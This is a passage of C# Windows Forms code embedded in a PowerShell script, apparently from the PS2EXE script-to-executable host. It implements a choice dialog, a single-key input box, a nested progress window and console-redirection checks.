ToolTip();\r\n\t\t\tButton buttonOk = new Button();\r\n\r\n\t\t\t// Sizes and positions are defined according to the label\r\n\t\t\t// This control has to be finished first when a prompt is available\r\n\t\t\tint iPosY = 19, iMaxX = 0;\r\n\t\t\tif (!string.IsNullOrEmpty(sPrompt))\r\n\t\t\t{\r\n\t\t\t\tLabel label = new Label();\r\n\t\t\t\tlabel.Text = sPrompt;\r\n\t\t\t\tlabel.Location = new Point(9, 19);\r\n\t\t\t\tlabel.MaximumSize = new System.Drawing.Size(System.Windows.Forms.Screen.FromControl(form).Bounds.Width*5/8 - 18, 0);\r\n\t\t\t\tlabel.AutoSize = true;\r\n\t\t\t\t// erst durch Add() wird die Größe des Labels ermittelt\r\n\t\t\t\tform.Controls.Add(label);\r\n\t\t\t\tiPosY = label.Bottom;\r\n\t\t\t\tiMaxX = label.Right;\r\n\t\t\t}\r\n\r\n\t\t\t// An den Radiobuttons orientieren sich die weiteren Größen und Positionen\r\n\t\t\t// Diese Controls also jetzt fertigstellen\r\n\t\t\tint Counter = 0;\r\n\t\t\tint tempWidth = System.Windows.Forms.Screen.FromControl(form).Bounds.Width*5/8 - 18;\r\n\t\t\tforeach (ChoiceDescription sAuswahl in aAuswahl)\r\n\t\t\t{\r\n\t\t\t\taradioButton[Counter] = new RadioButton();\r\n\t\t\t\taradioButton[Counter].Text = sAuswahl.Label;\r\n\t\t\t\tif (Counter == iVorgabe)\r\n\t\t\t\t\taradioButton[Counter].Checked = true;\r\n\t\t\t\taradioButton[Counter].Location = new Point(9, iPosY);\r\n\t\t\t\taradioButton[Counter].AutoSize = true;\r\n\t\t\t\t// erst durch Add() wird die Größe des Labels ermittelt\r\n\t\t\t\tform.Controls.Add(aradioButton[Counter]);\r\n\t\t\t\tif (aradioButton[Counter].Width > tempWidth)\r\n\t\t\t\t{ // radio field to wide for screen -> make two lines\r\n\t\t\t\t\tint tempHeight = aradioButton[Counter].Height;\r\n\t\t\t\t\taradioButton[Counter].Height = tempHeight*(1 + (aradioButton[Counter].Width-1)/tempWidth);\r\n\t\t\t\t\taradioButton[Counter].Width = tempWidth;\r\n\t\t\t\t\taradioButton[Counter].AutoSize = false;\r\n\t\t\t\t}\r\n\t\t\t\tiPosY = aradioButton[Counter].Bottom;\r\n\t\t\t\tif (aradioButton[Counter].Right > iMaxX) { iMaxX = aradioButton[Counter].Right; }\r\n\t\t\t\tif (!string.IsNullOrEmpty(sAuswahl.HelpMessage))\r\n\t\t\t\t\t toolTip.SetToolTip(aradioButton[Counter], sAuswahl.HelpMessage);\r\n\t\t\t\tCounter++;\r\n\t\t\t}\r\n\r\n\t\t\t// Tooltip auch anzeigen, wenn Parent-Fenster inaktiv ist\r\n\t\t\ttoolTip.ShowAlways = true;\r\n\r\n\t\t\t// Button erzeugen\r\n\t\t\tbuttonOk.Text = \"OK\";\r\n\t\t\tbuttonOk.DialogResult = DialogResult.OK;\r\n\t\t\tbuttonOk.SetBounds(System.Math.Max(12, iMaxX - 77), iPosY + 36, 75, 23);\r\n\r\n\t\t\t// configure form\r\n\t\t\tif (string.IsNullOrEmpty(sTitle))\r\n\t\t\t\tform.Text = System.AppDomain.CurrentDomain.FriendlyName;\r\n\t\t\telse\r\n\t\t\t\tform.Text = sTitle;\r\n\t\t\tform.ClientSize = new System.Drawing.Size(System.Math.Max(178, iMaxX + 10), iPosY + 71);\r\n\t\t\tform.Controls.Add(buttonOk);\r\n\t\t\tform.FormBorderStyle = FormBorderStyle.FixedDialog;\r\n\t\t\tform.StartPosition = FormStartPosition.CenterScreen;\r\n\t\t\ttry {\r\n\t\t\t\tform.Icon = Icon.ExtractAssociatedIcon(Assembly.GetExecutingAssembly().Location);\r\n\t\t\t}\r\n\t\t\tcatch\r\n\t\t\t{ }\r\n\t\t\tform.MinimizeBox = false;\r\n\t\t\tform.MaximizeBox = false;\r\n\t\t\tform.AcceptButton = buttonOk;\r\n\r\n\t\t\t// show and compute form\r\n\t\t\tif (form.ShowDialog() == DialogResult.OK)\r\n\t\t\t{ int iRueck = -1;\r\n\t\t\t\tfor (Counter = 0; Counter < aAuswahl.Count; Counter++)\r\n\t\t\t\t{\r\n\t\t\t\t\tif (aradioButton[Counter].Checked == true)\r\n\t\t\t\t\t{ iRueck = Counter; }\r\n\t\t\t\t}\r\n\t\t\t\treturn iRueck;\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t\treturn -1;\r\n\t\t}\r\n\t}\r\n\r\n\tpublic class ReadKeyBox\r\n\t{\r\n\t\t[DllImport(\"user32.dll\")]\r\n\t\tpublic static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpKeyState,\r\n\t\t\t[Out, MarshalAs(UnmanagedType.LPWStr, SizeConst = 64)] System.Text.StringBuilder pwszBuff,\r\n\t\t\tint cchBuff, uint wFlags);\r\n\r\n\t\tstatic string GetCharFromKeys(Keys keys, bool bShift, bool bAltGr)\r\n\t\t{\r\n\t\t\tSystem.Text.StringBuilder buffer = new System.Text.StringBuilder(64);\r\n\t\t\tbyte[] keyboardState = new byte[256];\r\n\t\t\tif (bShift)\r\n\t\t\t{ keyboardState[(int) Keys.ShiftKey] = 0xff; }\r\n\t\t\tif (bAltGr)\r\n\t\t\t{ keyboardState[(int) Keys.ControlKey] = 0xff;\r\n\t\t\t\tkeyboardState[(int) Keys.Menu] = 0xff;\r\n\t\t\t}\r\n\t\t\tif (ToUnicode((uint) keys, 0, keyboardState, buffer, 64, 0) >= 1)\r\n\t\t\t\treturn buffer.ToString();\r\n\t\t\telse\r\n\t\t\t\treturn \"\\0\";\r\n\t\t}\r\n\r\n\t\tclass KeyboardForm : Form\r\n\t\t{\r\n\t\t\tpublic KeyboardForm()\r\n\t\t\t{\r\n\t\t\t\tthis.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);\r\n\t\t\t\tthis.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;\r\n\t\t\t\tthis.KeyDown += new KeyEventHandler(KeyboardForm_KeyDown);\r\n\t\t\t\tthis.KeyUp += new KeyEventHandler(KeyboardForm_KeyUp);\r\n\t\t\t}\r\n\r\n\t\t\t// check for KeyDown or KeyUp?\r\n\t\t\tpublic bool checkKeyDown = true;\r\n\t\t\t// key code for pressed key\r\n\t\t\tpublic KeyInfo keyinfo;\r\n\r\n\t\t\tvoid KeyboardForm_KeyDown(object sender, KeyEventArgs e)\r\n\t\t\t{\r\n\t\t\t\tif (checkKeyDown)\r\n\t\t\t\t{ // store key info\r\n\t\t\t\t\tkeyinfo.VirtualKeyCode = e.KeyValue;\r\n\t\t\t\t\tkeyinfo.Character = GetCharFromKeys(e.KeyCode, e.Shift, e.Alt & e.Control)[0];\r\n\t\t\t\t\tkeyinfo.KeyDown = false;\r\n\t\t\t\t\tkeyinfo.ControlKeyState = 0;\r\n\t\t\t\t\tif (e.Alt) { keyinfo.ControlKeyState = ControlKeyStates.LeftAltPressed | ControlKeyStates.RightAltPressed; }\r\n\t\t\t\t\tif (e.Control)\r\n\t\t\t\t\t{ keyinfo.ControlKeyState |= ControlKeyStates.LeftCtrlPressed | ControlKeyStates.RightCtrlPressed;\r\n\t\t\t\t\t\tif (!e.Alt)\r\n\t\t\t\t\t\t{ if (e.KeyValue > 64 && e.KeyValue < 96) keyinfo.Character = (char)(e.KeyValue - 64); }\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif (e.Shift) { keyinfo.ControlKeyState |= ControlKeyStates.ShiftPressed; }\r\n\t\t\t\t\tif ((e.Modifiers & System.Windows.Forms.Keys.CapsLock) > 0) { keyinfo.ControlKeyState |= ControlKeyStates.CapsLockOn; }\r\n\t\t\t\t\tif ((e.Modifiers & System.Windows.Forms.Keys.NumLock) > 0) { keyinfo.ControlKeyState |= ControlKeyStates.NumLockOn; }\r\n\t\t\t\t\t// and close the form\r\n\t\t\t\t\tthis.Close();\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\tvoid KeyboardForm_KeyUp(object sender, KeyEventArgs e)\r\n\t\t\t{\r\n\t\t\t\tif (!checkKeyDown)\r\n\t\t\t\t{ // store key info\r\n\t\t\t\t\tkeyinfo.VirtualKeyCode = e.KeyValue;\r\n\t\t\t\t\tkeyinfo.Character = GetCharFromKeys(e.KeyCode, e.Shift, e.Alt & e.Control)[0];\r\n\t\t\t\t\tkeyinfo.KeyDown = true;\r\n\t\t\t\t\tkeyinfo.ControlKeyState = 0;\r\n\t\t\t\t\tif (e.Alt) { keyinfo.ControlKeyState = ControlKeyStates.LeftAltPressed | ControlKeyStates.RightAltPressed; }\r\n\t\t\t\t\tif (e.Control)\r\n\t\t\t\t\t{ keyinfo.ControlKeyState |= ControlKeyStates.LeftCtrlPressed | ControlKeyStates.RightCtrlPressed;\r\n\t\t\t\t\t\tif (!e.Alt)\r\n\t\t\t\t\t\t{ if (e.KeyValue > 64 && e.KeyValue < 96) keyinfo.Character = (char)(e.KeyValue - 64); }\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif (e.Shift) { keyinfo.ControlKeyState |= ControlKeyStates.ShiftPressed; }\r\n\t\t\t\t\tif ((e.Modifiers & System.Windows.Forms.Keys.CapsLock) > 0) { keyinfo.ControlKeyState |= ControlKeyStates.CapsLockOn; }\r\n\t\t\t\t\tif ((e.Modifiers & System.Windows.Forms.Keys.NumLock) > 0) { keyinfo.ControlKeyState |= ControlKeyStates.NumLockOn; }\r\n\t\t\t\t\t// and close the form\r\n\t\t\t\t\tthis.Close();\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic static KeyInfo Show(string sTitle, string sPrompt, bool bIncludeKeyDown)\r\n\t\t{\r\n\t\t\t// Controls erzeugen\r\n\t\t\tKeyboardForm form = new KeyboardForm();\r\n\t\t\tLabel label = new Label();\r\n\r\n\t\t\t// Am Label orientieren sich die Größen und Positionen\r\n\t\t\t// Dieses Control also zuerst fertigstellen\r\n\t\t\tif (string.IsNullOrEmpty(sPrompt))\r\n\t\t\t{\r\n\t\t\t\t\tlabel.Text = \"Press a key\";\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t\tlabel.Text = sPrompt;\r\n\t\t\tlabel.Location = new Point(9, 19);\r\n\t\t\tlabel.MaximumSize = new System.Drawing.Size(System.Windows.Forms.Screen.FromControl(form).Bounds.Width*5/8 - 18, 0);\r\n\t\t\tlabel.AutoSize = true;\r\n\t\t\t// erst durch Add() wird die Größe des Labels ermittelt\r\n\t\t\tform.Controls.Add(label);\r\n\r\n\t\t\t// configure form\r\n\t\t\tif (string.IsNullOrEmpty(sTitle))\r\n\t\t\t\tform.Text = System.AppDomain.CurrentDomain.FriendlyName;\r\n\t\t\telse\r\n\t\t\t\tform.Text = sTitle;\r\n\t\t\tform.ClientSize = new System.Drawing.Size(System.Math.Max(178, label.Right + 10), label.Bottom + 55);\r\n\t\t\tform.FormBorderStyle = FormBorderStyle.FixedDialog;\r\n\t\t\tform.StartPosition = FormStartPosition.CenterScreen;\r\n\t\t\ttry {\r\n\t\t\t\tform.Icon = Icon.ExtractAssociatedIcon(Assembly.GetExecutingAssembly().Location);\r\n\t\t\t}\r\n\t\t\tcatch\r\n\t\t\t{ }\r\n\t\t\tform.MinimizeBox = false;\r\n\t\t\tform.MaximizeBox = false;\r\n\r\n\t\t\t// show and compute form\r\n\t\t\tform.checkKeyDown = bIncludeKeyDown;\r\n\t\t\tform.ShowDialog();\r\n\t\t\treturn form.keyinfo;\r\n\t\t}\r\n\t}\r\n\r\n\tpublic class ProgressForm : Form\r\n\t{\r\n\t\tprivate ConsoleColor ProgressBarColor = ConsoleColor.DarkCyan;\r\n\r\n\t\tstruct ProgressData\r\n\t\t{\r\n\t\t\tinternal Label lblActivity;\r\n\t\t\tinternal Label lblStatus;\r\n\t\t\tinternal ProgressBar objProgressBar;\r\n\t\t\tinternal Label lblRemainingTime;\r\n\t\t\tinternal Label lblOperation;\r\n\t\t\tinternal int ActivityId;\r\n\t\t\tinternal int ParentActivityId;\r\n\t\t\tinternal int Depth;\r\n\t\t};\r\n\r\n\t\tprivate List<ProgressData> progressDataList = new List<ProgressData>();\r\n\r\n\t\tprivate Color DrawingColor(ConsoleColor color)\r\n\t\t{ // convert ConsoleColor to System.Drawing.Color\r\n\t\t\tswitch (color)\r\n\t\t\t{\r\n\t\t\t\tcase ConsoleColor.Black: return Color.Black;\r\n\t\t\t\tcase ConsoleColor.Blue: return Color.Blue;\r\n\t\t\t\tcase ConsoleColor.Cyan: return Color.Cyan;\r\n\t\t\t\tcase ConsoleColor.DarkBlue: return ColorTranslator.FromHtml(\"#000080\");\r\n\t\t\t\tcase ConsoleColor.DarkGray: return ColorTranslator.FromHtml(\"#808080\");\r\n\t\t\t\tcase ConsoleColor.DarkGreen: return ColorTranslator.FromHtml(\"#008000\");\r\n\t\t\t\tcase ConsoleColor.DarkCyan: return ColorTranslator.FromHtml(\"#008080\");\r\n\t\t\t\tcase ConsoleColor.DarkMagenta: return ColorTranslator.FromHtml(\"#800080\");\r\n\t\t\t\tcase ConsoleColor.DarkRed: return ColorTranslator.FromHtml(\"#800000\");\r\n\t\t\t\tcase ConsoleColor.DarkYellow: return ColorTranslator.FromHtml(\"#808000\");\r\n\t\t\t\tcase ConsoleColor.Gray: return ColorTranslator.FromHtml(\"#C0C0C0\");\r\n\t\t\t\tcase ConsoleColor.Green: return ColorTranslator.FromHtml(\"#00FF00\");\r\n\t\t\t\tcase ConsoleColor.Magenta: return Color.Magenta;\r\n\t\t\t\tcase ConsoleColor.Red: return Color.Red;\r\n\t\t\t\tcase ConsoleColor.White: return Color.White;\r\n\t\t\t\tdefault: return Color.Yellow;\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tprivate void InitializeComponent()\r\n\t\t{\r\n\t\t\tthis.SuspendLayout();\r\n\r\n\t\t\tthis.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);\r\n\t\t\tthis.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;\r\n\r\n\t\t\tthis.AutoScroll = true;\r\n\t\t\tthis.Text = System.AppDomain.CurrentDomain.FriendlyName;\r\n\t\t\tthis.Height = 147;\r\n\t\t\tthis.Width = 800;\r\n\t\t\tthis.BackColor = Color.White;\r\n\t\t\tthis.FormBorderStyle = FormBorderStyle.FixedSingle;\r\n\t\t\tthis.MinimizeBox = false;\r\n\t\t\tthis.MaximizeBox = false;\r\n\t\t\tthis.ControlBox = false;\r\n\t\t\tthis.StartPosition = FormStartPosition.CenterScreen;\r\n\r\n\t\t\tthis.ResumeLayout();\r\n\t\t}\r\n\r\n\t\tprivate void AddBar(ref ProgressData pd, int position)\r\n\t\t{\r\n\t\t\t// Create Label\r\n\t\t\tpd.lblActivity = new Label();\r\n\t\t\tpd.lblActivity.Left = 5;\r\n\t\t\tpd.lblActivity.Top = 104*position + 10;\r\n\t\t\tpd.lblActivity.Width = 800 - 20;\r\n\t\t\tpd.lblActivity.Height = 16;\r\n\t\t\tpd.lblActivity.Font = new Font(pd.lblActivity.Font, FontStyle.Bold);\r\n\t\t\tpd.lblActivity.Text = \"\";\r\n\t\t\t// Add Label to Form\r\n\t\t\tthis.Controls.Add(pd.lblActivity);\r\n\r\n\t\t\t// Create Label\r\n\t\t\tpd.lblStatus = new Label();\r\n\t\t\tpd.lblStatus.Left = 25;\r\n\t\t\tpd.lblStatus.Top = 104*position + 26;\r\n\t\t\tpd.lblStatus.Width = 800 - 40;\r\n\t\t\tpd.lblStatus.Height = 16;\r\n\t\t\tpd.lblStatus.Text = \"\";\r\n\t\t\t// Add Label to Form\r\n\t\t\tthis.Controls.Add(pd.lblStatus);\r\n\r\n\t\t\t// Create ProgressBar\r\n\t\t\tpd.objProgressBar = new ProgressBar();\r\n\t\t\tpd.objProgressBar.Value = 0;\r\n$(if ($noVisualStyles) {@\"\r\n\t\t\tpd.objProgressBar.Style = ProgressBarStyle.Continuous;\r\n\"@ } else {@\"\r\n\t\t\tpd.objProgressBar.Style = ProgressBarStyle.Blocks;\r\n\"@ })\r\n\t\t\tpd.objProgressBar.ForeColor = DrawingColor(ProgressBarColor);\r\n\t\t\tif (pd.Depth < 15)\r\n\t\t\t{\r\n\t\t\t\tpd.objProgressBar.Size = new System.Drawing.Size(800 - 60 - 30*pd.Depth, 20);\r\n\t\t\t\tpd.objProgressBar.Left = 25 + 30*pd.Depth;\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tpd.objProgressBar.Size = new System.Drawing.Size(800 - 60 - 450, 20);\r\n\t\t\t\tpd.objProgressBar.Left = 25 + 450;\r\n\t\t\t}\r\n\t\t\tpd.objProgressBar.Top = 104*position + 47;\r\n\t\t\t// Add ProgressBar to Form\r\n\t\t\tthis.Controls.Add(pd.objProgressBar);\r\n\r\n\t\t\t// Create Label\r\n\t\t\tpd.lblRemainingTime = new Label();\r\n\t\t\tpd.lblRemainingTime.Left = 5;\r\n\t\t\tpd.lblRemainingTime.Top = 104*position + 72;\r\n\t\t\tpd.lblRemainingTime.Width = 800 - 20;\r\n\t\t\tpd.lblRemainingTime.Height = 16;\r\n\t\t\tpd.lblRemainingTime.Text = \"\";\r\n\t\t\t// Add Label to Form\r\n\t\t\tthis.Controls.Add(pd.lblRemainingTime);\r\n\r\n\t\t\t// Create Label\r\n\t\t\tpd.lblOperation = new Label();\r\n\t\t\tpd.lblOperation.Left = 25;\r\n\t\t\tpd.lblOperation.Top = 104*position + 88;\r\n\t\t\tpd.lblOperation.Width = 800 - 40;\r\n\t\t\tpd.lblOperation.Height = 16;\r\n\t\t\tpd.lblOperation.Text = \"\";\r\n\t\t\t// Add Label to Form\r\n\t\t\tthis.Controls.Add(pd.lblOperation);\r\n\t\t}\r\n\r\n\t\tpublic int GetCount()\r\n\t\t{\r\n\t\t\treturn progressDataList.Count;\r\n\t\t}\r\n\r\n\t\tpublic ProgressForm()\r\n\t\t{\r\n\t\t\tInitializeComponent();\r\n\t\t}\r\n\r\n\t\tpublic ProgressForm(ConsoleColor BarColor)\r\n\t\t{\r\n\t\t\tProgressBarColor = BarColor;\r\n\t\t\tInitializeComponent();\r\n\t\t}\r\n\r\n\t\tpublic void Update(ProgressRecord objRecord)\r\n\t\t{\r\n\t\t\tif (objRecord == null)\r\n\t\t\t\treturn;\r\n\r\n\t\t\tint currentProgress = -1;\r\n\t\t\tfor (int i = 0; i < progressDataList.Count; i++)\r\n\t\t\t{\r\n\t\t\t\tif (progressDataList[i].ActivityId == objRecord.ActivityId)\r\n\t\t\t\t{ currentProgress = i;\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\tif (objRecord.RecordType == ProgressRecordType.Completed)\r\n\t\t\t{\r\n\t\t\t\tif (currentProgress < 0) return;\r\n\r\n\t\t\t\tthis.Controls.Remove(progressDataList[currentProgress].lblActivity);\r\n\t\t\t\tthis.Controls.Remove(progressDataList[currentProgress].lblStatus);\r\n\t\t\t\tthis.Controls.Remove(progressDataList[currentProgress].objProgressBar);\r\n\t\t\t\tthis.Controls.Remove(progressDataList[currentProgress].lblRemainingTime);\r\n\t\t\t\tthis.Controls.Remove(progressDataList[currentProgress].lblOperation);\r\n\r\n\t\t\t\tprogressDataList[currentProgress].lblActivity.Dispose();\r\n\t\t\t\tprogressDataList[currentProgress].lblStatus.Dispose();\r\n\t\t\t\tprogressDataList[currentProgress].objProgressBar.Dispose();\r\n\t\t\t\tprogressDataList[currentProgress].lblRemainingTime.Dispose();\r\n\t\t\t\tprogressDataList[currentProgress].lblOperation.Dispose();\r\n\r\n\t\t\t\tprogressDataList.RemoveAt(currentProgress);\r\n\r\n\t\t\t\tif (progressDataList.Count == 0)\r\n\t\t\t\t{\r\n\t\t\t\t\tthis.Close();\r\n\t\t\t\t\treturn;\r\n\t\t\t\t}\r\n\r\n\t\t\t\tfor (int i = currentProgress; i < progressDataList.Count; i++)\r\n\t\t\t\t{\r\n\t\t\t\t\tprogressDataList[i].lblActivity.Top = 104*i + 10;\r\n\t\t\t\t\tprogressDataList[i].lblStatus.Top = 104*i + 26;\r\n\t\t\t\t\tprogressDataList[i].objProgressBar.Top = 104*i + 47;\r\n\t\t\t\t\tprogressDataList[i].lblRemainingTime.Top = 104*i + 72;\r\n\t\t\t\t\tprogressDataList[i].lblOperation.Top = 104*i + 88;\r\n\t\t\t\t}\r\n\r\n\t\t\t\tif (104*progressDataList.Count + 43 <= System.Windows.Forms.Screen.FromControl(this).Bounds.Height)\r\n\t\t\t\t{\r\n\t\t\t\t\tthis.Height = 104*progressDataList.Count + 43;\r\n\t\t\t\t\tthis.Location = new Point((System.Windows.Forms.Screen.FromControl(this).Bounds.Width - this.Width)/2, (System.Windows.Forms.Screen.FromControl(this).Bounds.Height - this.Height)/2);\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tthis.Height = System.Windows.Forms.Screen.FromControl(this).Bounds.Height;\r\n\t\t\t\t\tthis.Location = new Point((System.Windows.Forms.Screen.FromControl(this).Bounds.Width - this.Width)/2, 0);\r\n\t\t\t\t}\r\n\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\r\n\t\t\tif (currentProgress < 0)\r\n\t\t\t{\r\n\t\t\t\tProgressData pd = new ProgressData();\r\n\t\t\t\tpd.ActivityId = objRecord.ActivityId;\r\n\t\t\t\tpd.ParentActivityId = objRecord.ParentActivityId;\r\n\t\t\t\tpd.Depth = 0;\r\n\r\n\t\t\t\tint nextid = -1;\r\n\t\t\t\tint parentid = -1;\r\n\t\t\t\tif (pd.ParentActivityId >= 0)\r\n\t\t\t\t{\r\n\t\t\t\t\tfor (int i = 0; i < progressDataList.Count; i++)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif (progressDataList[i].ActivityId == pd.ParentActivityId)\r\n\t\t\t\t\t\t{ parentid = i;\r\n\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\r\n\t\t\t\tif (parentid >= 0)\r\n\t\t\t\t{\r\n\t\t\t\t\tpd.Depth = progressDataList[parentid].Depth + 1;\r\n\r\n\t\t\t\t\tfor (int i = parentid + 1; i < progressDataList.Count; i++)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif ((progressDataList[i].Depth < pd.Depth) || ((progressDataList[i].Depth == pd.Depth) && (progressDataList[i].ParentActivityId != pd.ParentActivityId)))\r\n\t\t\t\t\t\t{ nextid = i;\r\n\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\r\n\t\t\t\tif (nextid == -1)\r\n\t\t\t\t{\r\n\t\t\t\t\tAddBar(ref pd, progressDataList.Count);\r\n\t\t\t\t\tcurrentProgress = progressDataList.Count;\r\n\t\t\t\t\tprogressDataList.Add(pd);\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tAddBar(ref pd, nextid);\r\n\t\t\t\t\tcurrentProgress = nextid;\r\n\t\t\t\t\tprogressDataList.Insert(nextid, pd);\r\n\r\n\t\t\t\t\tfor (int i = currentProgress+1; i < progressDataList.Count; i++)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprogressDataList[i].lblActivity.Top = 104*i + 10;\r\n\t\t\t\t\t\tprogressDataList[i].lblStatus.Top = 104*i + 26;\r\n\t\t\t\t\t\tprogressDataList[i].objProgressBar.Top = 104*i + 47;\r\n\t\t\t\t\t\tprogressDataList[i].lblRemainingTime.Top = 104*i + 72;\r\n\t\t\t\t\t\tprogressDataList[i].lblOperation.Top = 104*i + 88;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\tif (104*progressDataList.Count + 43 <= System.Windows.Forms.Screen.FromControl(this).Bounds.Height)\r\n\t\t\t\t{\r\n\t\t\t\t\tthis.Height = 104*progressDataList.Count + 43;\r\n\t\t\t\t\tthis.Location = new Point((System.Windows.Forms.Screen.FromControl(this).Bounds.Width - this.Width)/2, (System.Windows.Forms.Screen.FromControl(this).Bounds.Height - this.Height)/2);\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tthis.Height = System.Windows.Forms.Screen.FromControl(this).Bounds.Height;\r\n\t\t\t\t\tthis.Location = new Point((System.Windows.Forms.Screen.FromControl(this).Bounds.Width - this.Width)/2, 0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\tif (!string.IsNullOrEmpty(objRecord.Activity))\r\n\t\t\t\tprogressDataList[currentProgress].lblActivity.Text = objRecord.Activity;\r\n\t\t\telse\r\n\t\t\t\tprogressDataList[currentProgress].lblActivity.Text = \"\";\r\n\r\n\t\t\tif (!string.IsNullOrEmpty(objRecord.StatusDescription))\r\n\t\t\t\tprogressDataList[currentProgress].lblStatus.Text = objRecord.StatusDescription;\r\n\t\t\telse\r\n\t\t\t\tprogressDataList[currentProgress].lblStatus.Text = \"\";\r\n\r\n\t\t\tif ((objRecord.PercentComplete >= 0) && (objRecord.PercentComplete <= 100))\r\n\t\t\t{\r\n\t\t\t\tprogressDataList[currentProgress].objProgressBar.Value = objRecord.PercentComplete;\r\n\t\t\t\tprogressDataList[currentProgress].objProgressBar.Visible = true;\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{ if (objRecord.PercentComplete > 100)\r\n\t\t\t\t{\r\n\t\t\t\t\tprogressDataList[currentProgress].objProgressBar.Value = 0;\r\n\t\t\t\t\tprogressDataList[currentProgress].objProgressBar.Visible = true;\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t\tprogressDataList[currentProgress].objProgressBar.Visible = false;\r\n\t\t\t}\r\n\r\n\t\t\tif (objRecord.SecondsRemaining >= 0)\r\n\t\t\t{\r\n\t\t\t\tSystem.TimeSpan objTimeSpan = new System.TimeSpan(0, 0, objRecord.SecondsRemaining);\r\n\t\t\t\tprogressDataList[currentProgress].lblRemainingTime.Text = \"Remaining time: \" + string.Format(\"{0:00}:{1:00}:{2:00}\", (int)objTimeSpan.TotalHours, objTimeSpan.Minutes, objTimeSpan.Seconds);\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t\tprogressDataList[currentProgress].lblRemainingTime.Text = \"\";\r\n\r\n\t\t\tif (!string.IsNullOrEmpty(objRecord.CurrentOperation))\r\n\t\t\t\tprogressDataList[currentProgress].lblOperation.Text = objRecord.CurrentOperation;\r\n\t\t\telse\r\n\t\t\t\tprogressDataList[currentProgress].lblOperation.Text = \"\";\r\n\r\n\t\t\tApplication.DoEvents();\r\n\t\t}\r\n\t}\r\n\"@})\r\n\r\n\t// define IsInputRedirected(), IsOutputRedirected() and IsErrorRedirected() here since they were introduced first with .Net 4.5\r\n\tpublic class ConsoleInfo\r\n\t{\r\n\t\tprivate enum FileType : uint\r\n\t\t{\r\n\t\t\tFILE_TYPE_UNKNOWN = 0x0000,\r\n\t\t\tFILE_TYPE_DISK = 0x0001,\r\n\t\t\tFILE_TYPE_CHAR = 0x0002,\r\n\t\t\tFILE_TYPE_PIPE = 0x0003,\r\n\t\t\tFILE_TYPE_REMOTE = 0x8000\r\n\t\t}\r\n\r\n\t\tprivate enum STDHandle : uint\r\n\t\t{\r\n\t\t\tSTD_INPUT_HANDLE = unchecked((uint)-10),\r\n\t\t\tSTD_OUTPUT_HANDLE = unchecked((uint)-11),\r\n\t\t\tSTD_ERROR_HANDLE = unchecked((uint)-12)\r\n\t\t}\r\n\r\n\t\t[DllImport(\"Kernel32.dll\")]\r\n\t\tstatic private extern UIntPtr GetStdHandle(STDHandle stdHandle);\r\n\r\n\t\t[DllImport(\"Kernel32.dll\")]\r\n\t\tstatic private extern FileType GetFileType(UIntPtr hFile);\r\n\r\n\t\tstatic public bool IsInputRedirected()\r\n\t\t{\r\n\t\t\tUIntPtr hInput = GetStdHandle(STDHandle.STD_INPUT_HANDLE);\r\n\t\t\tFileType fileType = (FileType)GetFileType(hInput);\r\n\t\t\tif ((fileType == FileType.FILE_TYPE_CHAR) || (fileType == FileType.FILE_TYPE_UNKNOWN))\r\n\t\t\t\treturn false;\r\n\t\t\treturn true;\r\n\t\t}\r\n\r\n\t\tstatic public bool IsOutputRedirected()\r\n\t\t{\r\n\t\t\tUIntPtr hOutput = GetStdHandle(STDHandle.STD_OUTPUT_HANDLE);\r\n\t\t\tFileType fileType = (FileType)GetFileType(hOutput);\r\n\t\t\tif ((fileType == FileType.FILE_TYPE_CHAR) || (fileType == FileType.FILE_TYPE_UNKNOWN))\r\n\t\t\t\treturn false;\r\n\t\t\treturn true;\r\n\t\t}\r\n\r\n\t\tstatic public bool IsErrorRedirected()\r\n\t\t{\r\n\t\t\tUIntPtr hError = GetStdHandle(STDHandle.STD_ERROR_HANDLE);\r\n\t\t\tFileType fileType = (FileType)GetFileType(hError);\r\n\t\t\tif ((fileType == FileType.FILE_TYPE_CHAR) || (fileType == FileType.FILE_TYPE_UNKNOWN))\r\n\t\t\t\treturn false;\r\n\t\t\treturn true;\r\n\t\t}\r\n\t}\r\n\r\n\r\n\tinternal class PS2EXEHostUI : PSHostUserInterface\r\n\t{\r\n\t\tprivate PS2EXEHostRawUI rawUI = null;\r\n\r\n\t\tpublic ConsoleColor ErrorForegroundColor = ConsoleColor.Red;\r\n\t\tpublic ConsoleColor ErrorBackgroundColor = ConsoleColor.Black;\r\n\r\n\t\tpublic ConsoleColor WarningForegroundColor = ConsoleColor.Yellow;\r\n\t\tpublic ConsoleColor WarningBackgroundColor = ConsoleColor.Black;\r\n\r\n\t\tpublic ConsoleColor DebugForegroundColor = ConsoleColor.Yellow;\r\n\t\tpublic 